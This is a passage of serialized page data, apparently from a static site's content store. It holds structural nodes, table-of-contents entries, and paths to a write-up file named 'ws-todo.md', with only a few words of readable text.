"value":52766},"And voila !",{"type":33,"tag":5227,"props":52768,"children":52769},{},[52770],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":52772},[52773,52774,52775,52777,52778],{"id":42,"depth":362,"text":45},{"id":48736,"depth":362,"text":48739},{"id":51342,"depth":362,"text":52776},"data column",{"id":51416,"depth":362,"text":51419},{"id":21053,"depth":362,"text":21056},"content:writeups:ws-todo.md","writeups/ws-todo.md","writeups/ws-todo",1749027219645]